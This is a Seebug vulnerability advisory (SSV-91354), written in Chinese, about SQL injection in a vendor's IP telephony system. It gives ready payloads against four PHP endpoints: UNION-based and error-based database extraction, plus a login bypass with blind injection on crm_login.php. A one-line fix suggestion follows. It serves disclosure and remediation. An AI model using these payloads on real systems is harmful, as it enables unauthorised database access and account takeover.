耐通科技IP电话系统 call-log.php等4处 SQL注入漏洞

基本字段

漏洞编号：: SSV-91354

披露/发现时间：: 未知

提交时间：: 2016-04-21

漏洞等级：

漏洞类别：: SQL 注入

影响组件：

漏洞作者：: 未知

提交者：: kikay

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 hhxx 共获得 0.4KB

### 0x01 框架介绍相关厂商：耐通科技公开时间： 2015-07-30 漏洞类型： SQL注射漏洞官方主页： http://nxnets.com ![](https://images.seebug.org/contribute/ea9c7bb4-cc89-4781-86c7-bf96b6a081fc) 耐通信息科技的IP语音通信系统为各级虚拟运营商、行业客户以及集团企业客户提供最有效、基于IP网络的通信业务手段，具有成本低、使用方便、可靠性和盈利性强的特点，并能有效兼容现有资源，与现有 PSTN 网络无缝连接。同时耐通还提供各类通讯终端产品，所有产品均已通过完整体系的严密测试，具有业界领先水平。 ### 0x02 漏洞细节 1. /transfer.php?action=getIVRFail&randomid=1434181126622&channel=1') UNION ALL SELECT CONCAT(0x3A403A,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3A403A)--%20 2. /call-log.php?randomid=1434180084664&agent=1'||(SELECT 'abc' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||' 3. /ipcc_record.php?randomid=1434181312237&agent=1') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('a'='a 4. 任意用户登陆+布尔型盲注 POST /crm_login.php HTTP/1.1 agent_name=-1' or 1=1--%20&agent_pwd=20&Issoftphone=yes&submit= POST /crm_login.php HTTP/1.1 agent_name=-1' or 1=2--%20&agent_pwd=20&Issoftphone=yes&submit= 漏洞证明： 1. ![](https://images.seebug.org/contribute/45e2a550-3f2e-4d57-bbf0-adf1a2ff3c19) 2. ![](https://images.seebug.org/contribute/8ddcb223-849b-49a0-9566-e1e77123c4ec) 3. ![](https://images.seebug.org/contribute/07f43990-e5be-424e-8f35-c002e17199c2) 4. ![](https://images.seebug.org/contribute/4c94f06d-3c01-4e47-b29e-5ee398f11051) ![](https://images.seebug.org/contribute/549541d2-8ec9-4f78-8856-16a352955865) ### 0x03 修复方案对参数进行判断并过滤，限制未登陆用户访问